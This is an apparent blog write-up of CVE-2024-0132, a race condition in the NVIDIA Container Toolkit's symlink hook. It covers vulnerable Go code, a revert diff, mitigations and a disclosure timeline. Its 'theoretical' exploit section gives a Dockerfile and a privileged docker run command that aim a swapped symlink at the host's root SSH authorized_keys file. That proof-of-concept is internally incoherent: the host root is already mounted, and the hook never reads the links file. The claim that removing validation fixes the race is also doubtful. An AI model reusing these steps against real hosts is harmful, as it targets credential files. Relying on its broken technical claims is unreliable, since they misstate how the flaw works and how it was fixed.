
CVE-2024-0132: TOCTOU Vulnerability in NVIDIA Container Toolkit

Amit Schendel

Mar 15, 2025 — 9 min read

Executive Summary

CVE-2024-0132 is a critical Time-of-Check Time-of-Use (TOCTOU) vulnerability affecting the NVIDIA Container Toolkit versions 1.16.1 and earlier. This vulnerability arises when the toolkit is used with its default configuration, potentially allowing a malicious container image to gain unauthorized access to the host file system. Successful exploitation can lead to code execution, denial of service, privilege escalation, information disclosure, and data tampering. The vulnerability does not impact use cases where Container Device Interface (CDI) is used.

Technical Details

Affected Systems

Software: NVIDIA Container Toolkit
Versions: 1.16.1 and earlier
Component: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go

The vulnerability also affects NVIDIA GPU Operator versions up to and including 24.6.1. The underlying issue resides within the NVIDIA Container Toolkit, which the GPU Operator utilizes.

Vulnerability Breakdown

The core of the vulnerability lies in the create-symlinks hook within the NVIDIA Container Toolkit. This hook is responsible for creating symbolic links inside the container that point to resources on the host system, enabling the container to access necessary drivers and libraries for GPU functionality.

A TOCTOU vulnerability occurs when a program checks the state of a resource (e.g., a file path) and then uses that resource, but the resource's state can change between the check and the use. In the context of CVE-2024-0132, the create-symlinks hook checks if a given path is within the allowed container root before creating a symbolic link. However, a malicious container image can manipulate the file system between the time of the check and the time the symbolic link is created, potentially causing the link to point outside the intended container root.
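
The general check-then-use pattern can be reproduced in a few lines of Go. The sketch below is not toolkit code: `checkThenRead`, `demoCheckThenRead`, and the `between` callback are hypothetical names, and the callback simply stands in for whatever an attacker manages to do inside the race window.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// checkThenRead is deliberately racy: it validates path by name (the check)
// and later reads it by name again (the use). The between callback runs in
// the gap and stands in for a concurrent attacker.
func checkThenRead(path string, between func()) (string, error) {
	info, err := os.Lstat(path) // check: Lstat does not follow symlinks
	if err != nil {
		return "", err
	}
	if !info.Mode().IsRegular() {
		return "", fmt.Errorf("%s is not a regular file", path)
	}

	between() // race window: the name can be re-pointed here

	data, err := os.ReadFile(path) // use: ReadFile follows symlinks
	if err != nil {
		return "", err
	}
	return string(data), nil
}

// demoCheckThenRead swaps a validated regular file for a symlink to another
// file between the check and the use.
func demoCheckThenRead() (string, error) {
	dir, err := os.MkdirTemp("", "toctou-sketch")
	if err != nil {
		return "", err
	}
	defer os.RemoveAll(dir)

	public := filepath.Join(dir, "public.txt")
	secret := filepath.Join(dir, "secret.txt")
	if err := os.WriteFile(public, []byte("public"), 0o600); err != nil {
		return "", err
	}
	if err := os.WriteFile(secret, []byte("secret"), 0o600); err != nil {
		return "", err
	}

	swap := func() {
		_ = os.Remove(public)
		_ = os.Symlink(secret, public)
	}
	return checkThenRead(public, swap)
}

func main() {
	got, err := demoCheckThenRead()
	fmt.Printf("read %q, err=%v\n", got, err)
}
```

The check passes because `public.txt` is a regular file when it is inspected, yet the read returns the contents of `secret.txt`. In a real race the swap happens in another process, so the attacker has to win the timing rather than being handed a callback.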

Root Cause Analysis

The vulnerability stems from the insufficient validation of paths during symbolic link creation. Specifically, the assertPathInRoot function, which was intended to prevent links from pointing outside the container root, could be bypassed due to race conditions.

The original implementation of assertPathInRoot resolved symbolic links to determine the final target path and then compared the result against the container root. A malicious container could exploit the gap between that check and the link creation as follows:

The attacker creates a symbolic link within the container root that initially points to a safe location.
The attacker arranges for a path that goes through this symbolic link to be passed to the create-symlinks hook.
The assertPathInRoot function resolves the symbolic link and verifies that the result is within the container root.
Immediately after the check, but before createLink calls os.Symlink, the malicious container re-points the symbolic link to a location outside the container root.
The createLink function then creates the symbolic link, which now lands in the attacker-chosen location on the host file system.
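
The sequence above can be simulated deterministically in a temporary directory. This is a sketch under stated assumptions, not the toolkit's code: `parentInRoot` and `simulateSymlinkRace` are hypothetical helpers, the directory names are invented, and the "attacker" runs inline between the check and the use instead of racing from another process.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// parentInRoot is a simplified stand-in for the check: it resolves the
// directory that will hold the link and reports whether it stays under root.
func parentInRoot(root, linkPath string) (bool, error) {
	parent, err := filepath.EvalSymlinks(filepath.Dir(linkPath))
	if err != nil {
		return false, err
	}
	inside := parent == root || strings.HasPrefix(parent, root+string(filepath.Separator))
	return inside, nil
}

// simulateSymlinkRace returns true if the link was created outside root even
// though the check passed.
func simulateSymlinkRace() (bool, error) {
	base, err := os.MkdirTemp("", "symlink-race-sketch")
	if err != nil {
		return false, err
	}
	defer os.RemoveAll(base)
	// Resolve the temp dir itself so comparisons are stable on systems where
	// the temp directory sits behind a symlink.
	if base, err = filepath.EvalSymlinks(base); err != nil {
		return false, err
	}

	root := filepath.Join(base, "root") // stands in for the container root
	safe := filepath.Join(root, "real")
	outside := filepath.Join(base, "outside") // stands in for the host
	for _, d := range []string{safe, outside} {
		if err := os.MkdirAll(d, 0o755); err != nil {
			return false, err
		}
	}

	// A symlink inside root that initially points to a safe location.
	lib := filepath.Join(root, "lib")
	if err := os.Symlink(safe, lib); err != nil {
		return false, err
	}
	linkPath := filepath.Join(lib, "libfoo.so")

	// The check: the path resolves inside root, so validation passes.
	ok, err := parentInRoot(root, linkPath)
	if err != nil {
		return false, err
	}
	if !ok {
		return false, fmt.Errorf("check unexpectedly rejected %s", linkPath)
	}

	// The race window: re-point the symlink outside root.
	if err := os.Remove(lib); err != nil {
		return false, err
	}
	if err := os.Symlink(outside, lib); err != nil {
		return false, err
	}

	// The use: the link is created through the swapped path component.
	if err := os.Symlink("libfoo.so.1", linkPath); err != nil {
		return false, err
	}

	_, err = os.Lstat(filepath.Join(outside, "libfoo.so"))
	return err == nil, nil
}

func main() {
	escaped, err := simulateSymlinkRace()
	fmt.Printf("link created outside root: %v (err=%v)\n", escaped, err)
}
```

The validation and the `os.Symlink` call each walk the path independently, so nothing ties the result of the first walk to the second.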

The following code snippet illustrates the vulnerable logic (before the patch):

func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
	linkPath, err := changeRoot(hostRoot, containerRoot, link)
	if err != nil {
		return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
	}
	if created[linkPath] {
		m.logger.Debugf("Link %v already created", linkPath)
		return nil
	}
	if err := assertPathInRoot(containerRoot, linkPath); err != nil {
		return err
	}

	targetPath, err := changeRoot(hostRoot, "/", target)
	if err != nil {
		return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
	}

	m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
	err = os.Symlink(targetPath, linkPath)
	if err != nil {
		return fmt.Errorf("failed to symlink %v to %v: %w", linkPath, targetPath, err)
	}

	created[linkPath] = true
	return nil
}

// assertPathInRoot ensures that the specified path is a subpath of root.
// This includes the resolution of relative paths and symlinks.
func assertPathInRoot(root string, path string) error {
	resolved, err := tryResolveLink(filepath.Clean(path))
	if err != nil {
		return err
	}
	if !strings.HasPrefix(resolved, root) {
		return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
	}
	return nil
}

// tryResolveLink resolves the specified path following symlinks.
// If the path does not exist, recursively resolve the parent of the path until
// one resolves successfully.
func tryResolveLink(path string) (string, error) {
	if path == "" || path == "/" {
		return path, nil
	}

	resolved, err := filepath.EvalSymlinks(path)
	if os.IsNotExist(err) {
		resolvedParent, err := tryResolveLink(filepath.Dir(path))
		if err != nil {
			return "", err
		}
		resolved := filepath.Join(resolvedParent, filepath.Base(path))
		return resolved, nil
	}

	return resolved, err
}
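
Separately from the race, the containment test in the listing relies on `strings.HasPrefix`, which compares raw strings and not path components. The sketch below contrasts that with a component-aware comparison built on `filepath.Rel`. The helper names and example paths are hypothetical, and whether such a sibling path is reachable in the toolkit depends on how the root is constructed, which the listing does not show. Neither variant closes the TOCTOU window.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// prefixCheck mirrors the string comparison used in the listing above.
func prefixCheck(root, path string) bool {
	return strings.HasPrefix(path, root)
}

// relCheck reports whether path is root itself or lies beneath it, comparing
// whole path components. It is purely lexical and does not resolve symlinks.
func relCheck(root, path string) bool {
	rel, err := filepath.Rel(root, path)
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

func main() {
	root := "/run/rootfs"
	for _, p := range []string{"/run/rootfs/usr/lib", "/run/rootfs-evil/usr/lib"} {
		fmt.Printf("%-26s prefix=%v rel=%v\n", p, prefixCheck(root, p), relCheck(root, p))
	}
}
```

A sibling directory whose name merely begins with the root's name passes the prefix comparison but is rejected by the component-aware one.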

Patch Analysis

The fix for CVE-2024-0132 involves reverting a previous change that introduced the path validation logic. This effectively removes the vulnerable code and mitigates the TOCTOU vulnerability.

The primary patch is a revert commit: dc2ccdd2fa1b199132d754ba8d7d545d30a1d5c9. This commit reverts the changes introduced by pull request #696, which added the assertPathInRoot function and related logic.

Here's the diff of the reverted code:

File: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
Additions: 5
Deletions: 68
Changes: 73
@@ -149,12 +149,13 @@ func (m command) run(c *cli.Context, cfg *config) error {
 	for _, l := range links {
 		parts := strings.Split(l, "::")
 		if len(parts) != 2 {
-			return fmt.Errorf("invalid symlink specification %v", l)
+			m.logger.Warningf("Invalid link specification %v", l)
+			continue
 		}

 		err := m.createLink(created, cfg.hostRoot, containerRoot, parts[0], parts[1])
 		if err != nil {
-			return fmt.Errorf("failed to create link %v: %w", parts, err)
+			m.logger.Warningf("Failed to create link %v: %v", parts, err)
 		}
 	}

@@ -165,27 +166,16 @@ func (m command) run(c *cli.Context, cfg *config) error {
 func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
 	linkPath, err := changeRoot(hostRoot, containerRoot, link)
 	if err != nil {
-		return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
+		m.logger.Warningf("Failed to resolve path for link %v relative to %v: %v", link, containerRoot, err)
 	}
 	if created[linkPath] {
 		m.logger.Debugf("Link %v already created", linkPath)
 		return nil
 	}
-	if err := assertPathInRoot(containerRoot, linkPath); err != nil {
-		return err
-	}

 	targetPath, err := changeRoot(hostRoot, "/", target)
 	if err != nil {
-		return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
-	}
-
-	parent := containerRoot
-	if !filepath.IsAbs(targetPath) {
-		parent = filepath.Dir(linkPath)
-	}
-	if err := assertPathInRoot(containerRoot, filepath.Join(parent, targetPath)); err != nil {
-		return err
+		m.logger.Warningf("Failed to resolve path for target %v relative to %v: %v", target, "/", err)
 	}

 	m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
@@ -201,59 +191,6 @@ func (m command) createLink(created map[string]bool, hostRoot string, containerR
 	return nil
 }

-// assertPathInRoot ensures that the specified path is a subpath of root.
-// This includes the resolution of relative paths and symlinks.
-func assertPathInRoot(root string, path string) error {
-	resolved, err := tryResolveLink(filepath.Clean(path))
-	if err != nil {
-		return err
-	}
-	if !strings.HasPrefix(resolved, root) {
-		return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
-	}
-	return nil
-}
-
-// tryResolveLink resolves the specified path following symlinks.
-// If the path does not exist, recursively resolve the parent of the path until
-// one resolves successfully.
-//
-// For example, assuming that we call this with a path
-//
-//	/container-root/foo/bar/baz.so
-//
-// If this path exists, then the symlink evaluation will succeed and the target
-// will be returned.
-//
-// Assuming that /container-root/foo exists, but /container-root/foo/bar does
-// not, the first call to EvalSymlinks with argument
-// /container-root/foo/bar/baz.so will fail resulting in a recursive call to
-// this function with an argument /container-root/foo/bar. Since this path also
-// doesn't exist this will result in an additional recursive call with an
-// argument /container-root/foo. Here EvalSymlinks will succeed and the strings
-// /bar and /baz.so will be appended to the result as we return along the
-// recursive call stack.
-//
-// If none of the parents of the path (with the exception of /) exist the path
-// will be returned as is with no error.
-func tryResolveLink(path string) (string, error) {
-	if path == "" || path == "/" {
-		return path, nil
-	}
-
-	resolved, err := filepath.EvalSymlinks(path)
-	if os.IsNotExist(err) {
-		resolvedParent, err := tryResolveLink(filepath.Dir(path))
-		if err != nil {
-			return "", err
-		}
-		resolved := filepath.Join(resolvedParent, filepath.Base(path))
-		return resolved, nil
-	}
-
-	return resolved, err
-}
-
 func changeRoot(current string, new string, path string) (string, error) {
 	if !filepath.IsAbs(path) {
 		return path, nil

The revert effectively removes the assertPathInRoot function and the calls to it, eliminating the TOCTOU vulnerability. While this might seem counterintuitive, the original validation logic was flawed and introduced a false sense of security while creating a new attack vector.
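
Besides dropping the validation, the diff changes the error policy of the loop over link specifications: the removed lines return on the first failure, while the added lines log a warning and move on. A minimal sketch of the two policies follows. `parseLinkSpec`, `processSpecs`, and the `failFast` switch are hypothetical names introduced for illustration; only the `target::link` format and the argument order are taken from the diff.

```go
package main

import (
	"fmt"
	"strings"
)

// parseLinkSpec splits a "target::link" specification, following the
// strings.Split(l, "::") call in the diff.
func parseLinkSpec(spec string) (target, link string, err error) {
	parts := strings.Split(spec, "::")
	if len(parts) != 2 {
		return "", "", fmt.Errorf("invalid symlink specification %v", spec)
	}
	return parts[0], parts[1], nil
}

// processSpecs applies create to each spec. With failFast set it behaves like
// the removed lines (stop at the first error); otherwise it behaves like the
// added lines (record a warning and continue).
func processSpecs(specs []string, failFast bool, create func(target, link string) error) (int, []string, error) {
	created := 0
	var warnings []string
	for _, s := range specs {
		target, link, err := parseLinkSpec(s)
		if err == nil {
			err = create(target, link)
		}
		if err != nil {
			if failFast {
				return created, warnings, err
			}
			warnings = append(warnings, err.Error())
			continue
		}
		created++
	}
	return created, warnings, nil
}

func main() {
	specs := []string{"libfoo.so.1::/usr/lib/libfoo.so", "malformed", "libbar.so.1::/usr/lib/libbar.so"}
	noop := func(target, link string) error { return nil } // stands in for createLink

	n, warns, err := processSpecs(specs, false, noop)
	fmt.Printf("warn-and-continue: created=%d warnings=%d err=%v\n", n, len(warns), err)

	n, warns, err = processSpecs(specs, true, noop)
	fmt.Printf("fail-fast:         created=%d warnings=%d err=%v\n", n, len(warns), err)
}
```

With warn-and-continue, one malformed specification no longer aborts the hook, so the remaining links are still attempted.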

Exploitation Techniques

An attacker can exploit this vulnerability by crafting a malicious container image that manipulates symbolic links during the create-symlinks hook execution.

Proof-of-Concept (PoC) Exploit (Theoretical):

Disclaimer: This PoC is theoretical and demonstrates the concept of the vulnerability. It might not work directly due to environment-specific configurations and security measures.

Create a Malicious Container Image:

The container image should contain a script that performs the following actions:

Creates a directory within the container root (e.g., /tmp/safe_dir).
Creates a symbolic link within /tmp/safe_dir (e.g., /tmp/safe_dir/my_link) that initially points to a safe location within the container (e.g., /tmp/safe_dir/target).
Defines a create-symlinks configuration that includes a link specification using /tmp/safe_dir/my_link.
After the create-symlinks hook checks the path, but before it creates the symbolic link, the script modifies /tmp/safe_dir/my_link to point to a sensitive location on the host file system (e.g., /hostfs/root/.ssh/authorized_keys).

Here's an example Dockerfile:

FROM ubuntu:latest

RUN apt-get update && apt-get install -y --no-install-recommends \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

RUN mkdir /tmp/safe_dir
RUN touch /tmp/safe_dir/target

# Create a script to exploit the TOCTOU vulnerability
RUN echo '#!/bin/bash' > /tmp/exploit.sh
RUN echo 'sleep 1' >> /tmp/exploit.sh
RUN echo 'rm /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN echo 'ln -s /hostfs/root/.ssh/authorized_keys /tmp/safe_dir/my_link' >> /tmp/exploit.sh
RUN chmod +x /tmp/exploit.sh

# Create the initial safe symlink
RUN ln -s /tmp/safe_dir/target /tmp/safe_dir/my_link

# Create the create-symlinks configuration
RUN echo '/tmp/safe_dir/target::/tmp/safe_dir/my_link' > /tmp/links.txt

# Mount the host root filesystem
RUN mkdir /hostfs
RUN echo 'mount --bind / /hostfs/root' >> /root/.bashrc

CMD ["/bin/bash", "-c", "/tmp/exploit.sh && sleep infinity"]

Run the Malicious Container:

When the container starts, the create-symlinks hook will be triggered. The hook will read the configuration from /tmp/links.txt and attempt to create the symbolic link. The /tmp/exploit.sh script will introduce a delay and then modify the symbolic link to point to the attacker's desired location.

```
docker run --gpus all --privileged -v /:/hostfs <image_name>
```

Note: The --privileged flag and the volume mount / to /hostfs are necessary for the exploit to work, as they provide the container with the required permissions to modify symbolic links and access the host file system.

Verify the Exploit:

After the container has been running for a short time, check the container's file system to see if the symbolic link /tmp/safe_dir/my_link now points to /hostfs/root/.ssh/authorized_keys. If successful, the attacker has gained access to the host's SSH authorized keys file.
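
The verification step can be scripted by reading the link itself without following it. The sketch below uses `os.Readlink` for that. `linkPointsTo` and `demoLinkPointsTo` are hypothetical helpers, and the paths in `main` are the ones from this theoretical PoC.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// linkPointsTo reports whether the symlink at link stores exactly want as its
// target. os.Readlink reads the link itself and does not follow it, so the
// target does not have to exist.
func linkPointsTo(link, want string) (bool, string, error) {
	got, err := os.Readlink(link)
	if err != nil {
		return false, "", err
	}
	return got == want, got, nil
}

// demoLinkPointsTo exercises the helper on a throwaway dangling symlink.
func demoLinkPointsTo() (bool, error) {
	dir, err := os.MkdirTemp("", "readlink-sketch")
	if err != nil {
		return false, err
	}
	defer os.RemoveAll(dir)

	const target = "/hostfs/root/.ssh/authorized_keys"
	link := filepath.Join(dir, "my_link")
	if err := os.Symlink(target, link); err != nil {
		return false, err
	}
	ok, _, err := linkPointsTo(link, target)
	return ok, err
}

func main() {
	ok, got, err := linkPointsTo("/tmp/safe_dir/my_link", "/hostfs/root/.ssh/authorized_keys")
	fmt.Printf("matches=%v target=%q err=%v\n", ok, got, err)
}
```

Run inside the container, `main` reports the stored target of /tmp/safe_dir/my_link. Outside of it the path is normally absent and an error is printed instead.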

Attack Scenarios and Real-World Impacts:

Privilege Escalation: By gaining access to sensitive files like /etc/shadow or /root/.ssh/authorized_keys, an attacker can escalate their privileges on the host system.
Data Exfiltration: The attacker can exfiltrate sensitive data from the host file system, such as configuration files, database credentials, or user data.
Denial of Service: The attacker can modify critical system files, causing the host system to become unstable or unusable.
Lateral Movement: In a Kubernetes environment, a successful container escape can allow an attacker to move laterally to other containers or nodes within the cluster.

Mitigation Strategies

The primary mitigation strategy is to upgrade to NVIDIA Container Toolkit version 1.16.2 or later, which includes the fix for CVE-2024-0132.
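
When auditing a fleet, the version threshold can be checked programmatically. The sketch below compares a plain MAJOR.MINOR.PATCH string against 1.16.2. `parseVersion` and `isPatched` are hypothetical helpers, how the installed version string is obtained is left out, and anything that is not three numeric components (for example a pre-release suffix) is rejected instead of guessed at.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// firstFixed is the first patched Container Toolkit release named above.
var firstFixed = [3]int{1, 16, 2}

// parseVersion accepts "1.16.2" or "v1.16.2" and nothing else.
func parseVersion(v string) ([3]int, error) {
	var out [3]int
	parts := strings.Split(strings.TrimPrefix(strings.TrimSpace(v), "v"), ".")
	if len(parts) != 3 {
		return out, fmt.Errorf("expected MAJOR.MINOR.PATCH, got %q", v)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return out, fmt.Errorf("invalid component %q in %q", p, v)
		}
		out[i] = n
	}
	return out, nil
}

// isPatched reports whether v is at or above the first fixed release,
// comparing components numerically from left to right.
func isPatched(v string) (bool, error) {
	got, err := parseVersion(v)
	if err != nil {
		return false, err
	}
	for i := range got {
		if got[i] != firstFixed[i] {
			return got[i] > firstFixed[i], nil
		}
	}
	return true, nil
}

func main() {
	for _, v := range []string{"1.9.0", "1.16.1", "1.16.2", "1.17.0"} {
		ok, err := isPatched(v)
		fmt.Printf("%-7s patched=%v err=%v\n", v, ok, err)
	}
}
```

Comparing numerically matters here: a plain string comparison would rank 1.9.0 above 1.16.2.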

Additional Mitigation Strategies:

Use Container Device Interface (CDI): The vulnerability does not affect use cases where CDI is used. CDI provides a more secure and standardized way to manage device access within containers.
Limit Privileged Containers: Avoid running containers with the --privileged flag unless absolutely necessary. Privileged containers have fewer security restrictions and can more easily exploit vulnerabilities.
Principle of Least Privilege: Grant containers only the minimum necessary permissions to perform their tasks. Avoid mounting the entire host file system into containers.
Regular Security Audits: Conduct regular security audits of container images and configurations to identify and address potential vulnerabilities.
Runtime Security Monitoring: Implement runtime security monitoring tools to detect and respond to suspicious activity within containers.
Image Scanning: Use container image scanning tools to identify vulnerabilities in container images before they are deployed.
Trusted Image Repositories: Only use container images from trusted sources. Verify the integrity of container images using digital signatures.

Timeline of Discovery and Disclosure

September 1, 2024: Wiz Research reports the vulnerability to the NVIDIA Product Security Incident Response Team (PSIRT).
September 3, 2024: NVIDIA acknowledges the report.
September 26, 2024: NVIDIA releases a security bulletin and ships a patched version (1.16.2) of the Container Toolkit.
September 26, 2024: Public disclosure of CVE-2024-0132.

References

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-0132
NVIDIA Security Bulletin: https://nvidia.custhelp.com/app/answers/detail/a_id/5582
Wiz Blog: https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
GitHub Repository: https://github.com/NVIDIA/nvidia-container-toolkit
Tenable: https://www.tenable.com/cve/CVE-2024-0132
Vulcan Cyber: https://vulcan.io/blog/how-to-fix-cve-2024-0132/
Opswat: https://www.opswat.com/blog/ai-vulnerability-in-hindsight-investigating-nvidia-container-toolkit-cve-2024-0132

Comparative Analysis

TOCTOU vulnerabilities are a well-known class of security flaws. Similar vulnerabilities have been found in other software systems, including operating system kernels, file systems, and network protocols.

One notable example is the "Dirty COW" vulnerability (CVE-2016-5195) in the Linux kernel. Dirty COW was a privilege escalation vulnerability that exploited a race condition in the kernel's handling of copy-on-write memory mappings, allowing a local user to write to files that were mapped read-only. Like CVE-2024-0132, it depended on the attacker winning a narrow timing window, although the race was in memory management rather than in path resolution.

The evolution of security practices has led to the development of various techniques to mitigate TOCTOU vulnerabilities, including:

Atomic Operations: Using atomic operations to ensure that a check and subsequent use of a resource occur as a single, indivisible operation.
File System Access Controls: Implementing stricter file system access controls to limit the ability of processes to modify files.
Capabilities-Based Security: Using capabilities-based security models to grant processes only the necessary permissions to access resources.
Secure Coding Practices: Following secure coding practices to avoid race conditions and other timing-related vulnerabilities.
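
As an illustration of the atomic-operations idea, a common pattern on Unix-like systems is to open the object first and then validate the open file descriptor, so the check and the use refer to the same object. The sketch below assumes a platform where `syscall.O_NOFOLLOW` is defined (Linux, macOS, the BSDs). `openRegularNoFollow` and `demoNoFollow` are hypothetical helpers, and this is not how the toolkit was fixed.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"syscall"
)

// openRegularNoFollow opens path without following a symlink in its final
// component, then validates the descriptor it already holds. Re-pointing the
// name afterwards cannot change which object the descriptor refers to.
func openRegularNoFollow(path string) (*os.File, error) {
	f, err := os.OpenFile(path, os.O_RDONLY|syscall.O_NOFOLLOW, 0)
	if err != nil {
		return nil, err
	}
	info, err := f.Stat() // inspects the open descriptor, not the name
	if err != nil {
		f.Close()
		return nil, err
	}
	if !info.Mode().IsRegular() {
		f.Close()
		return nil, fmt.Errorf("%s is not a regular file", path)
	}
	return f, nil
}

// demoNoFollow reports whether a regular file was accepted and whether a
// symlink to it was rejected.
func demoNoFollow() (bool, bool, error) {
	dir, err := os.MkdirTemp("", "nofollow-sketch")
	if err != nil {
		return false, false, err
	}
	defer os.RemoveAll(dir)

	regular := filepath.Join(dir, "data.txt")
	if err := os.WriteFile(regular, []byte("ok"), 0o600); err != nil {
		return false, false, err
	}
	link := filepath.Join(dir, "link.txt")
	if err := os.Symlink(regular, link); err != nil {
		return false, false, err
	}

	regularOK := false
	if f, err := openRegularNoFollow(regular); err == nil {
		regularOK = true
		f.Close()
	}
	_, linkErr := openRegularNoFollow(link)
	return regularOK, linkErr != nil, nil
}

func main() {
	regularOK, symlinkRejected, err := demoNoFollow()
	fmt.Printf("regular accepted=%v symlink rejected=%v err=%v\n", regularOK, symlinkRejected, err)
}
```

`O_NOFOLLOW` only guards the final path component, so symlinks in intermediate directories are still followed. Confining a whole path walk to a directory tree needs a stronger primitive, such as Linux `openat2` with `RESOLVE_IN_ROOT` or the `os.Root` type introduced in Go 1.24.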

In the case of CVE-2024-0132, the path validation logic that was added to keep links inside the container root proved ineffective because the check itself was open to a TOCTOU race. The final fix reverted the flawed validation logic, which highlights the importance of careful design and testing when implementing security measures.